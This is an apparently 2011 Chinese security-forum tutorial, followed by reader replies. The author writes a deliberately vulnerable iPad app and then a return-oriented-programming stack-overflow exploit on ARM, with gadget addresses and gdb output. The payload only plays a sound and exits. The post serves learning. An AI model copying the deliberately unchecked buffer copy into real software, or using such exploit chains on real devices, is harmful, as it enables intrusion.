[原创]IPAD下的漏洞利用helloworld-iOS安全-看雪-安全社区|安全招聘|kanxue.com

[原创]IPAD下的漏洞利用helloworld

发表于: 2011-1-3 11:35 41119

[原创]IPAD下的漏洞利用helloworld

txstc

2011-1-3 11:35

41119

近来看了些ROP (Return-Oriented-Program)的文章。这种主要用于突破NX的shellcode编写方式很早就以return-to-lib为人熟知，近两年ROP的研究似乎开始倾向非x86非windows系统（比如路由器，或其他RISC（ARM）下的*nix系统）。刚好最近手头有台IPAD，就打算在它上面写个简单的ROP。在网上找了半天，除了jailbreakme2.0的代码包外，就没有找到其他的POC可供参考了。以前没有接触过Mac，这个代码包着实不知道如何下手分析（

看Readme介绍好像是make过后会生成利用pdf解析漏洞的pdf文件，但jailbreakme并不是功能简单的POC，它要下载安装cydia，作为分析源并不理想，所以代码下载下来现在也没仔细读过）。
最后想还是依托自己熟悉的那点的知识搞个简单的例子上手吧。

首先是操作环境的创建，除了IPAD和电脑还需要一个无线路由。IPAD刚刚越过狱（IOS 3.2 ，虽然现在都4.2了，不过既然软件都能运行，何必升级呢，升了级没准再多些内存保护措施）。既然手头没有safari的0day，jailbreakme也分析不明白，就只能自己写个漏洞程序供利用了。在windows下就是一个包含如下语句的vul.c

[/FONT]
[FONT=楷体]…[/FONT]
[FONT=楷体]strcpy(buf,payload);[/FONT]
[FONT=楷体]…[/FONT]
[FONT=楷体]

但在IPAD下面创建一个类似的程序就得折腾一番了

。想写IPAD程序需要MacOSX操作系统和Xcode开发环境。在PC上把这两个东西装好绝对是体力活，那几天我把各种版本的Mac OSX（10.6.X）在win7的Vmware7的虚拟机下来来回回装了不知道多少遍。直到安装成功时，我已经忘了我究竟装的是哪个论坛推出的版本了（光盘影像文件叫iAntares_v3.iso对应MaxOSX 10.6.5，Xcode为3.2.4，虽然仅支持IOS3.2和IOS4.0，但足以了）。整个过程基本上是按照各种教程安装下来的，如果你也打算搭建个这样的环境，其中有几点需要特别注意：

1.各种版本的教程连同他们的组合都要尝试，在PC下装MacOSX哪一个教程都不是100%成功（和硬件相关性较大）。
2.建议用虚拟机，不然经不起折腾。Vmware7是很好的选择，因为它支持dmg的映像文件，不必把dmg用UltraISO转换为iso（Xcode的安装映像很多时候就是dmg格式）。
3.安装前，鼠标和键盘的驱动选项一定要调整。安装完毕后也许不能正常启动（启动后定格在灰色苹果处或黑屏），将启动光盘映像换成darwin300.iso多半就可以了。

安装完毕就可以用Xcode开始写代码了（还需要突破Xcode自身的代码签名过程，否则就需要 $99/年的证书，因此还需要参考教程配置Xcode和操作系统环境）。“用XCode 3.2.5为越狱的iPhone 免证书开发调试”，这篇文章参考价值很大，参看时需要改动个别版本号。至于IPAD的helloword，就更好找了。自此开发的环境就设定好了，连线就能在Xcode里面编译并传送程序到IPAD里面了。

在触摸press时的事件处理函数如下

[/FONT]
[COLOR=black][FONT=楷体][COLOR=black]- ([/COLOR][COLOR=#aa0d91]IBAction[/COLOR][COLOR=black])btnClicked:([/COLOR][COLOR=#aa0d91]id[/COLOR][COLOR=black]) sender {[/COLOR][/FONT]
[FONT=楷体][COLOR=black]         [/COLOR][COLOR=#26474b]foo[/COLOR][COLOR=black]();[/COLOR][/FONT]
[FONT=楷体][COLOR=black]         [/COLOR][COLOR=#5c2699]UIAlertView[/COLOR][COLOR=black] *alert=[[[/COLOR][COLOR=#5c2699]UIAlertView[/COLOR][COLOR=black] [/COLOR][COLOR=#2e0d6e]alloc[/COLOR][COLOR=black]] [/COLOR][COLOR=#2e0d6e]initWithTitle[/COLOR][COLOR=black]:[/COLOR][COLOR=#c41a16]@"Hello World!"[/COLOR][/FONT]
[FONT=楷体][COLOR=black]                                                                  [/COLOR][COLOR=#2e0d6e]message[/COLOR][COLOR=black]:[/COLOR][COLOR=#c41a16]@"sound"[/COLOR][COLOR=black]                   [/COLOR][/FONT]
[FONT=楷体][COLOR=black]                                                                  [/COLOR][COLOR=#2e0d6e]delegate[/COLOR][COLOR=black]:[/COLOR][COLOR=#aa0d91]self[/COLOR][/FONT]
[FONT=楷体][COLOR=black]                                                      [/COLOR][COLOR=#2e0d6e]cancelButtonTitle[/COLOR][COLOR=black]:[/COLOR][COLOR=#c41a16]@"OK"[/COLOR][/FONT]
[FONT=楷体][COLOR=black]                                                      [/COLOR][COLOR=#2e0d6e]otherButtonTitles[/COLOR][COLOR=black]:[/COLOR][COLOR=#aa0d91]nil[/COLOR][COLOR=black]];[/COLOR][/FONT]
[FONT=楷体][COLOR=black]         [alert [/COLOR][COLOR=#2e0d6e]show[/COLOR][COLOR=black]];[/COLOR][/FONT]
[FONT=楷体][COLOR=black]         [alert [/COLOR][COLOR=#2e0d6e]release[/COLOR][COLOR=black]];[/COLOR][/FONT]
[FONT=楷体][COLOR=black]}[/COLOR][/FONT]
[/COLOR][FONT=楷体]

其中foo函数就是触发漏洞的函数了。它的代码很简单

[/FONT]
[COLOR=#aa0d91][FONT=楷体][COLOR=#aa0d91]void[/COLOR][COLOR=black] foo(){[/COLOR][/FONT]
[FONT=楷体][COLOR=black]         [/COLOR][COLOR=#aa0d91]char[/COLOR][COLOR=black] buf[[/COLOR][COLOR=#1c00cf]4[/COLOR][COLOR=black]]; [/COLOR][/FONT]
[FONT=楷体][COLOR=black]         [/COLOR][COLOR=#26474b]fulfill[/COLOR][COLOR=black](buf);   [/COLOR][/FONT]
[FONT=楷体]

用fulfill函数来填充这个缓冲区就能够实现最基本的返回点覆盖了。这里需要注意以下几点arm下的IOS与x86的MacOSX的区别：

1. NX/XN bit

x86的MacOSX使用NX位（也就是Intel的XD位），arm的IOS使用XN(execute never)位。对于MacOSX，仅对栈设置了该位，堆仍然是可执行的（RWX）。IOS下则对所有页面使用了XN位，任何页面都不能具有RWX属性（IOS就是一个单任务的桌面系统，不需要JAVA和FLASH，因此能够做到这一点）。

2. ASLR

MacOSX对加载的库文件（除了dyld）进行地址随机化，堆栈和可执行映像都没有进行随机。IOS连库文件都没有进行随机化，也就是说针对一个特定型号的固件，堆栈，可执行映像以及库的地址都是可以预测的。

3. CodeSign

在没有越狱的IOS上，二进制文件和库都是被签过名的，execve函数执行前会首先执行dyld中的loadCodeSignature函数，这是与MacOSX的区别。但鉴于我的IPAD已近越过狱了，且并不进行什么涉及execve的操作，这部分就不关心了。

更为详细的叙述，可以参看"Fun and Games with Mac OS X and IPhone Payloads"。作者就是曾在Pwn2Own上攻破Safari和IE8的Charlie Miller。
直接注入代码很明显是不可能了，ROP大显伸手的时候到了。ROP的基本思想用x86更容易解释一些：当覆盖返回值或其他方式控制了栈时，返回时我们让eip指向类似如下的指令序列：XXX; ret这样就执行了一个XXX（也许就是简单的改变一个寄存器的值）操作，然后就ret了。ret会从栈上取出下一条指令的地址，然后跳转过去，同样这次我们选取的指令仍为XXX;ret的格式，每次使用的指令最后都以ret结尾，利用栈来控制指令执行流程，这就是ROP了。
而现在我们面对的是RISC的ARM指令，就稍微有些区别了。ARM体系下，包含r0-r13,sp,lr,pc等多个寄存器，没有ret指令，但指令指针PC是我们可以直接操作的，每条指令都是四字节（thumb指令为两字节，thumb-2里面四字节和两字节指令混合）。函数的参数传递规则是，前四个参数使用r0-r3传递，更多的参数才使用栈。通常函数返回使用 pop {r7,pc}或bx lr等方式（bx，b类似jmp为跳转指令，但bx可以指定跳转区域究竟为thumb还是arm指令）。
我们的目标是溢出后执行下面的操作

 [COLOR=indigo][B]AudioServicesPlaySystemSound(0x3ea);[/B][/COLOR][/FONT]
[FONT=楷体][COLOR=indigo][B]_exit;[/B][/COLOR][/FONT]
[FONT=楷体]

也就是让该程序溢出后发出提示音后退出。接下来就需要在我们的程序空间搜索所需要的指令地址，填充栈，构成ROP了。这部分我用的方法很低效的（实在没有找到什么好的工具，以前仅用msf搜索过的跳板指令）。比如我需要将r0赋值为0x3ea作为函数参数，用了__dyld_stub_binder中的指令序列：

[COLOR=navy][B]mov r12,r0[/B][/COLOR][/FONT]
[FONT=楷体][COLOR=navy][B]pop {r0,r1,r2,r3,r7,lr} ；从栈中取值给r0赋值[/B][/COLOR][/FONT]
[FONT=楷体][COLOR=navy][B]add sp,sp,#8[/B][/COLOR][/FONT]
[FONT=楷体][COLOR=navy][B]bx r12[/B][/COLOR]

为了搜索这条指令，我把dyld库从IPAD中复制到主机(使用winscp，需要在IPAD上安装openssh)，用IDA反汇编分析。但IDA似乎没有类似OD那种即时汇编指令为机器码的功能。因此只能查ARM手册自己将需要的汇编代码转为机器码字节了（这样才能搜索）。我把需要的汇编代码内联汇编写到first_ipad_view程序（也就是刚刚编写的存在漏洞的程序）中，然后用gdb（使用cydia安装到IPAD，一定要更新到最新版本6.3.50，否则指令解析有问题。然后用putty通过ssh连接到IPAD，这就是开篇无线路由器的用意。我本想用Xcode带的调试器调程序，但却总是提示Program not being run，另外用gdbserver+IDA或IPhone_server+IDA也一直没能连接成功，所以只能ssh+gdb调了。记得要用cydia安装cmd以及其相关的各种指令包，比如ps命令）察看那些代码的机器码（很麻烦很笨~我也没办法，哪位有快速获得ARM指令机器码的方法麻烦告诉我吧~）。找到机器码序列后，在IDA中用Alt+B搜索，定位位置后再到gdb中察看改指令的地址。比如上述指令的地址就是0x30cc05d0。
通过IDA分析只能搜索dyld库的指令，还有其他可执行映像中的指令搜索其实可以用gdb直接搜索。如下gdb代码能搜索0x30247bc8到0x30247e14地址中的机器码为0x800fe8bd的ARM指令。

[COLOR=navy][B]set $count=0x30247bc8[/B][/COLOR][/FONT]
[FONT=楷体][COLOR=navy][B]while($count<0x30247e14)[/B][/COLOR][/FONT]
[FONT=楷体][COLOR=navy][B]if(*((unsigned int *)($count))==0x800fe8bd)[/B][/COLOR][/FONT]
[FONT=楷体][COLOR=navy][B]x/x ($count)[/B][/COLOR][/FONT]
[FONT=楷体][COLOR=navy][B]end[/B][/COLOR][/FONT]
[FONT=楷体][COLOR=navy][B]set $count=$count+4[/B][/COLOR][/FONT]
[FONT=楷体][COLOR=navy][B]end[/B][/COLOR]

过了很久，终于搜集到了需要的指令地址了。这里省略掉中间繁荣复杂纠结的调试和指令搜索过程，直接跳到结论部分。用于填充缓冲区的fulfill函数如下

[/FONT]
[COLOR=#aa0d91][FONT=楷体][COLOR=#aa0d91]void[/COLOR][COLOR=black] fulfill([/COLOR][COLOR=#aa0d91]char[/COLOR][COLOR=black] *buf){[/COLOR][/FONT]
[FONT=楷体][COLOR=black]         [/COLOR][COLOR=#aa0d91]unsigned[/COLOR][COLOR=black] [/COLOR][COLOR=#aa0d91]int[/COLOR][COLOR=black] shellcode[[/COLOR][COLOR=#1c00cf]32[/COLOR][COLOR=black]];[/COLOR][/FONT]
[FONT=楷体][COLOR=black]         shellcode[[/COLOR][COLOR=#1c00cf]0[/COLOR][COLOR=black]] =[/COLOR][COLOR=#1c00cf]0x11112222[/COLOR][COLOR=black];[/COLOR][/FONT]
[FONT=楷体][COLOR=black]         shellcode[[/COLOR][COLOR=#1c00cf]1[/COLOR][COLOR=black]] =[/COLOR][COLOR=#1c00cf]0x33334444[/COLOR][COLOR=black];[/COLOR][COLOR=#007400]//r7[/COLOR][/FONT]
[FONT=楷体][COLOR=black]         shellcode[[/COLOR][COLOR=#1c00cf]2[/COLOR][COLOR=black]] =[/COLOR][COLOR=#1c00cf]0x30c1a858[/COLOR][COLOR=black];[/COLOR][COLOR=#007400]//pc pop {r4,r5,r8,r9,pc}  [/COLOR][COLOR=#007400]位于[/COLOR][COLOR=#007400]OSAtomicAdd64Barrier[/COLOR][COLOR=#007400]中[/COLOR][/FONT]
[FONT=楷体][COLOR=black]         shellcode[[/COLOR][COLOR=#1c00cf]3[/COLOR][COLOR=black]] =[/COLOR][COLOR=#1c00cf]0x00002cc5[/COLOR][COLOR=black];[/COLOR][COLOR=#007400]//r4[/COLOR][/FONT]
[FONT=楷体][COLOR=black]         shellcode[[/COLOR][COLOR=#1c00cf]4[/COLOR][COLOR=black]] =[/COLOR][COLOR=#1c00cf]0x00122690[/COLOR][COLOR=black];[/COLOR][COLOR=#007400]//r5[/COLOR][/FONT]
[FONT=楷体][COLOR=black]         shellcode[[/COLOR][COLOR=#1c00cf]5[/COLOR][COLOR=black]] =[/COLOR][COLOR=#1c00cf]0x30794b8d[/COLOR][COLOR=black];[/COLOR][COLOR=#007400]//r8->r0->r12->AudioServicesPlaySystemSound[/COLOR][/FONT]
[FONT=楷体][COLOR=black]         shellcode[[/COLOR][COLOR=#1c00cf]6[/COLOR][COLOR=black]] =[/COLOR][COLOR=#1c00cf]0x22443322[/COLOR][COLOR=black];[/COLOR][COLOR=#007400]//r9[/COLOR][/FONT]
[FONT=楷体][COLOR=black]         shellcode[[/COLOR][COLOR=#1c00cf]7[/COLOR][COLOR=black]] =[/COLOR][COLOR=#1c00cf]0x30c1a850[/COLOR][COLOR=black];[/COLOR][COLOR=#007400]//pc mov r0,r8;mov r1,r9;pop {r4,r5,r8,r9,pc} [/COLOR][/FONT]
[FONT=楷体][COLOR=black]         shellcode[[/COLOR][COLOR=#1c00cf]8[/COLOR][COLOR=black]] =[/COLOR][COLOR=#1c00cf]0x000003ea[/COLOR][COLOR=black];[/COLOR][COLOR=#007400]//r4[/COLOR][/FONT]
[FONT=楷体][COLOR=black]         shellcode[[/COLOR][COLOR=#1c00cf]9[/COLOR][COLOR=black]] =[/COLOR][COLOR=#1c00cf]0x00122690[/COLOR][COLOR=black];[/COLOR][COLOR=#007400]//r5[/COLOR][/FONT]
[FONT=楷体][COLOR=black]         shellcode[[/COLOR][COLOR=#1c00cf]10[/COLOR][COLOR=black]]=[/COLOR][COLOR=#1c00cf]0x00002cc5[/COLOR][COLOR=black];[/COLOR][COLOR=#007400]//r8[/COLOR][/FONT]
[FONT=楷体][COLOR=black]         shellcode[[/COLOR][COLOR=#1c00cf]11[/COLOR][COLOR=black]]=[/COLOR][COLOR=#1c00cf]0x34474dd7[/COLOR][COLOR=black];[/COLOR][COLOR=#007400]//r9[/COLOR][/FONT]
[FONT=楷体][COLOR=black]         shellcode[[/COLOR][COLOR=#1c00cf]12[/COLOR][COLOR=black]]=[/COLOR][COLOR=#1c00cf]0x30cc05d0[/COLOR][COLOR=black];[/COLOR][COLOR=#007400]//pc mov r12,r0;pop {r0,r1,r2,r3,r7,lr};add sp,sp,#8;bx r12[/COLOR][/FONT]
[FONT=楷体][COLOR=black]         shellcode[[/COLOR][COLOR=#1c00cf]13[/COLOR][COLOR=black]]=[/COLOR][COLOR=#1c00cf]0x000003ea[/COLOR][COLOR=black];[/COLOR][COLOR=#007400]//r0[/COLOR][/FONT]
[FONT=楷体][COLOR=black]         shellcode[[/COLOR][COLOR=#1c00cf]14[/COLOR][COLOR=black]]=[/COLOR][COLOR=#1c00cf]0x00002cc5[/COLOR][COLOR=black];[/COLOR][COLOR=#007400]//r1[/COLOR][/FONT]
[FONT=楷体][COLOR=black]         shellcode[[/COLOR][COLOR=#1c00cf]15[/COLOR][COLOR=black]]=[/COLOR][COLOR=#1c00cf]0x0013a8d0[/COLOR][COLOR=black];[/COLOR][COLOR=#007400]//r2[/COLOR][/FONT]
[FONT=楷体][COLOR=black]         shellcode[[/COLOR][COLOR=#1c00cf]16[/COLOR][COLOR=black]]=[/COLOR][COLOR=#1c00cf]0x0013a8d0[/COLOR][COLOR=black];[/COLOR][COLOR=#007400]//r3[/COLOR][/FONT]
[FONT=楷体][COLOR=black]         shellcode[[/COLOR][COLOR=#1c00cf]17[/COLOR][COLOR=black]]=[/COLOR][COLOR=#1c00cf]0x2fffeb88[/COLOR][COLOR=black];[/COLOR][COLOR=#007400]//r7[/COLOR][/FONT]
[FONT=楷体][COLOR=black]         shellcode[[/COLOR][COLOR=#1c00cf]18[/COLOR][COLOR=black]]=[/COLOR][COLOR=#1c00cf]0x30c3d170[/COLOR][COLOR=black];[/COLOR][COLOR=#007400]//lr _exit  [/COLOR][/FONT]
[FONT=楷体][COLOR=black]         [/COLOR][COLOR=#643820]memcpy[/COLOR][COLOR=black](buf,shellcode,[/COLOR][COLOR=#1c00cf]32[/COLOR][COLOR=black]*[/COLOR][COLOR=#1c00cf]4[/COLOR][COLOR=black]);[/COLOR][/FONT]
[FONT=楷体][COLOR=black]}  [/COLOR][/FONT]
[/COLOR][FONT=楷体]

在看这些指令前，先解释一下为什么不是在foo中直接使用memcpy来覆盖buf。因为Xcode使用的memcpy和strcpy都会因此编译为memcpy_chk$stub和strcpy_chk$stub，也就是包含边界检查的函数版本。那样溢出时不会发生的（边界检查越界就会终止运行）。使用fulfill函数中的memcpy“看不到”foo函数中的buf大小，没办法进行check，就会使用_dyld_memcpy和_dyld_strcpy原始版本，因此能够产生可利用的漏洞。该过程和Miller的文章中实验类似，但他当时就直接在foo中进行了覆盖，估计他的Xcode版本较低没有这样的内存保护机制。接下来就解释一下ROP的工作过程了。用putty连接到IPAD的ssh：

root# ps aux

USER    PID %CPU %MEM    VSZ RSS TT  STAT STARTED    TIME COMMAND
mobile    817 0.0  3.8 349472 9492 ??  Ss 10:18PM 0:00.27 /var/mobile/Applications/5E16589D-24B9-413D-B3F3-608F02FA5F7E/first_ipad_view.app/first_ipad_view
root#gdb
GNU gdb 6.3.50.20050815-cvs (Sat Sep 19 05:37:57 UTC 2009)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "--host=arm-apple-darwin9 --target=".
(gdb) attach 817
Attaching to process 817.
Reading symbols for shared libraries . done
Reading symbols for shared libraries warning: Could not find object file
............................................................. done
0x30c16668 in mach_msg_trap ()
(gdb)disassemble foo
0x00002864 <foo+0>:    push {r7, lr}
0x00002866 <foo+2>:    add    r7, sp, #0
0x00002868 <foo+4>:    sub    sp, #4
0x0000286a <foo+6>:    mov    r3, sp
0x0000286c <foo+8>:    mov    r0, r3
0x0000286e <foo+10>: bl    0x277c <fulfill>
0x00002872 <foo+14>: sub.w sp, r7, #0    ; 0x0
0x00002876 <foo+18>: pop    {r7, pc}
执行到<foo+18>后查看堆栈
(gdb) x/20x $sp
0x2fffeb60:    0x33334444    0x30c1a858    0x00002cc5    0x00122690
0x2fffeb70:    0x30794b8d    0x22443322    0x30c1a850    0x000003ea
0x2fffeb80:    0x00122690    0x00002cc5    0x34474dd7    0x30cc05d0
0x2fffeb90:    0x000003ea    0x00002cc5    0x0013a8d0    0x0013a8d0
0x2fffeba0:    0x2fffeb88    0x30c3d170    0x0000345c    0x3852c7ec

Shellcode[0]用于覆盖buf，shellcode[1]覆盖了栈中的r7（类似ebp)。0x2876就是foo返回的地方。特别需要解释的是shellcode[5] =0x30794b8d，这个数据会覆盖r8，然后赋值给r0，最后传给r12，然后通过bx r12转过去，这个地址对应AudioServicesPlaySystemSound，该函数实际地址为0x30794b8c，但直接填写该地址却总是产生SIGSYS信号(非法指令执行)。原因就是该函数为thumb指令，因此跳转时必须要把指令地址的最低位设置为1（bx 通过这一位来区分指令集），所以函数地址就加了一。察看AudioServicesPlaySystemSound函数开始字节为

(gdb) disassemble AudioServicesPlaySystemSound

Dump of assembler code for function AudioServicesPlaySystemSound:
0x30794b8c <AudioServicesPlaySystemSound+0>: push {r4, r7, lr}

可判断其返回时因该是跳转到lr，所以要通过pop将_exit地址存到lr中，Audio函数执行后就会转到_exit中。自此，一个没有字符限制的IPhoneOS下的简单的栈溢出的ROP就完成了。复杂操作（网络通信传送文件等）就需要更多指令序列来完成了。ROP本身并不难领会，但为了实现这个过程，环境和工具的取得也很令人头疼~本文充其量也就是抛砖引玉，希望哪天能看到有人发个jailbreakme的分析~

[培训]《安卓高级研修班(网课)》月薪三万计划，掌握调试、分析还原ollvm、vmp的方法，定制art虚拟机自动化脱壳的方法

上传的附件：

1.PNG （124.57kb，2504次下载）
IMG_0025.png （759.11kb，2574次下载）
IMG_0027.png （27.80kb，2491次下载）

收藏・26

免费・7

支持

最新回复 (30) 1 2 ▶
ycmint 雪币： 1149 活跃值： (833) 能力值： ( LV13，RANK：260 ) 在线值：发帖 28 回帖 893 粉丝 10 关注私信	ycmint 5 2 楼。。。。。。第一次抢座位。。。堆栈，可执行映像以及库的地址都是可以预测的。 lz 就直接用了绝对地址安排了 shellcode 。。。堆栈的平衡 lz 直接用了exit 解决。。。手上没有这么先进的东东，也想用不同的方式玩玩。。。继续顶楼主。。。 2011-1-3 12:02 0
NWMonster 雪币： 134 活跃值： (84) 能力值： ( LV5，RANK：60 ) 在线值：发帖 26 回帖 457 粉丝 8 关注私信	NWMonster 1 3 楼纯膜拜+围观 2011-1-3 13:40 0
pmma 雪币： 178 活跃值： (144) 能力值： ( LV4，RANK：50 ) 在线值：发帖 24 回帖 191 粉丝 0 关注私信	pmma 1 4 楼膜拜～没精力继续研究下去了，跟着楼主学习学习 2011-1-3 16:05 0
b23526 雪币： 4580 活跃值： (992) 能力值： ( LV4，RANK：50 ) 在线值：发帖 351 回帖 1832 粉丝 4 关注私信	b23526 5 楼穷人飘过......... 2011-1-3 17:09 0
zzczhu 雪币： 122 活跃值： (44) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 40 粉丝 0 关注私信	zzczhu 6 楼可否请LZ调整一下字体，看起来许多字费劲啊 2011-1-3 17:13 0
txstc 雪币： 2242 活跃值： (169) 能力值： ( LV11，RANK：180 ) 在线值：发帖 6 回帖 57 粉丝 9 关注私信	txstc 4 7 楼哪部分字体费劲呢，是因为字体小吗？ 2011-1-3 17:49 0
butian 雪币： 122 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 168 粉丝 0 关注私信	butian 8 楼膜拜，学习下！ 2011-1-4 08:07 0
XiaosanAiq 雪币： 296 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 10 回帖 180 粉丝 0 关注私信	XiaosanAiq 9 楼字体过小。。。看完眼睛花了。。。加大，加粗！ 2011-1-4 11:25 0
txstc 雪币： 2242 活跃值： (169) 能力值： ( LV11，RANK：180 ) 在线值：发帖 6 回帖 57 粉丝 9 关注私信	txstc 4 10 楼原来我这边显示的大小挺正常的啊~不过还是调大了一点 2011-1-4 13:27 0
zzxxaa 雪币： 42 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 146 粉丝 0 关注私信	zzxxaa 11 楼来学习学习嘿嘿 2011-1-5 08:03 0
冷酷果冻雪币： 227 活跃值： (55) 能力值： ( LV3，RANK：20 ) 在线值：发帖 6 回帖 37 粉丝 0 关注私信	冷酷果冻 12 楼顶礼膜拜一把！家里有个IPAD，没事也想搞搞它。 2011-1-5 16:57 0
lixupeng 雪币： 563 活跃值： (95) 能力值： ( LV2，RANK：10 ) 在线值：发帖 31 回帖 1636 粉丝 0 关注私信	lixupeng 13 楼新鲜！！！ 2011-1-5 18:35 0
snowdbg 雪币： 3171 活跃值： (76) 能力值： (RANK：250 ) 在线值：发帖 13 回帖 129 粉丝 2 关注私信	snowdbg 6 14 楼呵呵不错不错正准备着手弄这个呢，楼主的例子可以参考参考，谢谢有问题还需请教 2011-1-7 15:13 0
fates 雪币： 144 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 39 粉丝 0 关注私信	fates 15 楼学习学习，挺 2011-1-7 16:55 0
Osleti 雪币： 349 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 67 粉丝 0 关注私信	Osleti 16 楼我手头只有iphone4....OS版本是4.2.1..不知道能否测试?? 2011-2-21 16:12 0
hacker一疒亻雪币： 261 活跃值： (83) 能力值： ( LV3，RANK：20 ) 在线值：发帖 42 回帖 418 粉丝 0 关注私信	hacker一疒亻 17 楼马上要出的ipad2 是否有同样的方法？回头试试看 2011-3-3 18:22 0
hacker一疒亻雪币： 261 活跃值： (83) 能力值： ( LV3，RANK：20 ) 在线值：发帖 42 回帖 418 粉丝 0 关注私信	hacker一疒亻 18 楼疙瘩了我也弄了一个ipad 没想到这玩意儿还有这么大的玩法儿——我指它的功能性。现在看到了你的文章后发现它不只是这些玩法了，日了，我要啃一啃了现在要发售ipad 2 了，但是前期在中国不发售准备买个美版的哇嘎嘎希望到时候你的这个教程还有用那样的话我就可以把ubuntu系统装上去了 2011-3-4 09:12 0
Lodd 雪币： 1240 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 148 粉丝 0 关注私信	Lodd 19 楼哦哟，楼主你强的，这才是玩iPad啊！ 2011-3-4 11:55 0
高比拜仁雪币： 745 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	高比拜仁 20 楼关注！感谢lz的分析和分享 2011-3-16 16:44 0
neineit 雪币： 397 活跃值： (352) 能力值： ( LV9，RANK：410 ) 在线值：发帖 19 回帖 224 粉丝 2 关注私信	neineit 10 21 楼 ~~ 总看成IDA下的漏洞利用顶一下。 2011-4-8 17:24 0
meakhella 雪币： 214 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 44 粉丝 0 关注私信	meakhella 22 楼只能膜拜， 2011-4-8 19:24 0
nkspark 雪币： 101 活跃值： (88) 能力值： ( LV2，RANK：140 ) 在线值：发帖 46 回帖 610 粉丝 0 关注私信	nkspark 3 23 楼牛啊，先顶后看~ 2011-4-11 11:44 0
soswww 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	soswww 24 楼收藏 2011-5-15 22:35 0
雅蠛蝶雪币： 28 活跃值： (25) 能力值： ( LV3，RANK：20 ) 在线值：发帖 4 回帖 22 粉丝 0 关注私信	雅蠛蝶 25 楼。。。拜服在楼主强大的耐力下 2011-11-2 17:13 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

txstc

发帖

回帖

180

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (30) 1 2 ▶
ycmint 雪币： 1149 活跃值： (833) 能力值： ( LV13，RANK：260 ) 在线值：发帖 28 回帖 893 粉丝 10 关注私信	ycmint 5 2 楼。。。。。。第一次抢座位。。。堆栈，可执行映像以及库的地址都是可以预测的。 lz 就直接用了绝对地址安排了 shellcode 。。。堆栈的平衡 lz 直接用了exit 解决。。。手上没有这么先进的东东，也想用不同的方式玩玩。。。继续顶楼主。。。 2011-1-3 12:02 0
NWMonster 雪币： 134 活跃值： (84) 能力值： ( LV5，RANK：60 ) 在线值：发帖 26 回帖 457 粉丝 8 关注私信	NWMonster 1 3 楼纯膜拜+围观 2011-1-3 13:40 0
pmma 雪币： 178 活跃值： (144) 能力值： ( LV4，RANK：50 ) 在线值：发帖 24 回帖 191 粉丝 0 关注私信	pmma 1 4 楼膜拜～没精力继续研究下去了，跟着楼主学习学习 2011-1-3 16:05 0
b23526 雪币： 4580 活跃值： (992) 能力值： ( LV4，RANK：50 ) 在线值：发帖 351 回帖 1832 粉丝 4 关注私信	b23526 5 楼穷人飘过......... 2011-1-3 17:09 0
zzczhu 雪币： 122 活跃值： (44) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 40 粉丝 0 关注私信	zzczhu 6 楼可否请LZ调整一下字体，看起来许多字费劲啊 2011-1-3 17:13 0
txstc 雪币： 2242 活跃值： (169) 能力值： ( LV11，RANK：180 ) 在线值：发帖 6 回帖 57 粉丝 9 关注私信	txstc 4 7 楼哪部分字体费劲呢，是因为字体小吗？ 2011-1-3 17:49 0
butian 雪币： 122 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 168 粉丝 0 关注私信	butian 8 楼膜拜，学习下！ 2011-1-4 08:07 0
XiaosanAiq 雪币： 296 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 10 回帖 180 粉丝 0 关注私信	XiaosanAiq 9 楼字体过小。。。看完眼睛花了。。。加大，加粗！ 2011-1-4 11:25 0
txstc 雪币： 2242 活跃值： (169) 能力值： ( LV11，RANK：180 ) 在线值：发帖 6 回帖 57 粉丝 9 关注私信	txstc 4 10 楼原来我这边显示的大小挺正常的啊~不过还是调大了一点 2011-1-4 13:27 0
zzxxaa 雪币： 42 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 146 粉丝 0 关注私信	zzxxaa 11 楼来学习学习嘿嘿 2011-1-5 08:03 0
冷酷果冻雪币： 227 活跃值： (55) 能力值： ( LV3，RANK：20 ) 在线值：发帖 6 回帖 37 粉丝 0 关注私信	冷酷果冻 12 楼顶礼膜拜一把！家里有个IPAD，没事也想搞搞它。 2011-1-5 16:57 0
lixupeng 雪币： 563 活跃值： (95) 能力值： ( LV2，RANK：10 ) 在线值：发帖 31 回帖 1636 粉丝 0 关注私信	lixupeng 13 楼新鲜！！！ 2011-1-5 18:35 0
snowdbg 雪币： 3171 活跃值： (76) 能力值： (RANK：250 ) 在线值：发帖 13 回帖 129 粉丝 2 关注私信	snowdbg 6 14 楼呵呵不错不错正准备着手弄这个呢，楼主的例子可以参考参考，谢谢有问题还需请教 2011-1-7 15:13 0
fates 雪币： 144 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 39 粉丝 0 关注私信	fates 15 楼学习学习，挺 2011-1-7 16:55 0
Osleti 雪币： 349 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 67 粉丝 0 关注私信	Osleti 16 楼我手头只有iphone4....OS版本是4.2.1..不知道能否测试?? 2011-2-21 16:12 0
